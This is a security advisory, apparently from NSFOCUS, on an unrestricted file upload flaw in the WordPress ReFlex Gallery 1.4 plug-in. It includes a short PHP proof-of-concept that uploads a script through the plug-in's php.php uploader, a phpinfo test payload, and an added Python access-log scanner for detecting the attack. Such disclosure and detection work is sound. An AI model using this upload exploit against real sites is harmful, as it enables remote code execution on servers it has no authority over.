Affected System:
WordPress ReFlex Gallery 1.4

Description:
ReFlex Gallery is a WordPress plug-in that integrates a gallery album.

WordPress ReFlex Gallery has a security vulnerability. wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php allows files with any extension to be uploaded to a folder in the webroot. By submitting a malicious PHP script, an attacker can execute arbitrary PHP code.

<* Source: Sammy Forgit
Links: http://packetstormsecurity.com/files/119218/wpreflexgallery-shell.txt
       http://www.securelist.com/en/advisories/51698
*>

Test method:
The following procedures (methods) may be offensive and are intended only for security research and teaching. Use them at your own risk!

Exploit:

PostShell.php

    <?php
    // Local file that is sent to the uploader
    $uploadfile = "lo.php";
    $ch = curl_init("http://localhost/wordpress/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php");
    curl_setopt($ch, CURLOPT_POST, true);
    // 'qqfile' is the form field the uploader reads the file from
    curl_setopt($ch, CURLOPT_POSTFIELDS, array('qqfile' => "@$uploadfile"));
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $postResult = curl_exec($ch);
    curl_close($ch);
    print "$postResult";
    ?>

Shell Access: http://localhost/wordpress/wp-content/uploads/Filename
PostShell.php output

lo.php

    <?php
    phpinfo();
    ?>

# Site: 1337day.com Inj3ct0r Exploit Database

Temporary solution:
If you cannot install or upgrade the patch immediately, NSFOCUS recommends that you take the following measures to reduce the threat:

* Disable the WordPress ReFlex Gallery plug-in.

Vendor patch:

WordPress
---------
Currently, the vendor has not provided a patch or an upgrade. We recommend that users of this software watch the vendor's homepage for the latest version:
http://wordpress.org/extend/plugins/reflex-gallery/
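To check whether the uploader described above has been used against a site, the following added example (not part of the original advisory) scans web-server access log lines for POST requests to the php.php uploader and for script files subsequently served from wp-content/uploads. The combined log format, the extension list and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Uploader endpoint named in the advisory, lowercased for case-insensitive
# matching; WordPress may be installed in a subdirectory, so match the suffix.
UPLOADER = "/wp-content/plugins/reflex-gallery/admin/scripts/fileuploader/php.php"
UPLOADS = "/wp-content/uploads/"
# Extensions often mapped to the PHP handler (assumption; adjust per server).
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.I)
# Apache/nginx "combined" format: client, timestamp, request line, status.
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3})')

def scan(lines):
    """Return (kind, client, path) findings in log order."""
    findings, uploaders = [], set()
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # skip malformed lines rather than guessing
        client, method, target, status = m.groups()
        # Normalise: drop the query string, decode %xx, collapse repeated slashes.
        path = re.sub(r"/{2,}", "/", unquote(target.split("?", 1)[0]))
        low = path.lower()
        if method == "POST" and low.endswith(UPLOADER):
            uploaders.add(client)
            findings.append(("upload_post", client, path))
        elif UPLOADS in low and SCRIPT_EXT.search(low) and status.startswith("2"):
            # A script served from uploads is suspicious by itself; it is stronger
            # evidence when the same client posted to the uploader earlier.
            kind = "script_after_upload" if client in uploaders else "script_hit"
            findings.append((kind, client, path))
    return findings

# Constructed sample log lines (not taken from a real server).
SAMPLE = [
    '203.0.113.7 - - [01/Jan/2013:10:00:01 +0000] "POST /wordpress/wp-content/plugins/'
    'reflex-gallery/admin/scripts/FileUploader/php.php HTTP/1.1" 200 45 "-" "curl"',
    '203.0.113.7 - - [01/Jan/2013:10:00:05 +0000] "GET /wordpress/wp-content/uploads/'
    'lo.php HTTP/1.1" 200 5120 "-" "curl"',
    '198.51.100.9 - - [01/Jan/2013:10:01:00 +0000] "GET /wordpress/wp-content/uploads/'
    '2013/01/cat.jpg HTTP/1.1" 200 20480 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [01/Jan/2013:10:02:00 +0000] "GET /wordpress/wp-content/uploads/'
    'x.PHP?c=1 HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

Any `upload_post` finding on a site that still has the plug-in installed warrants a review of the uploads directory for files that are not media.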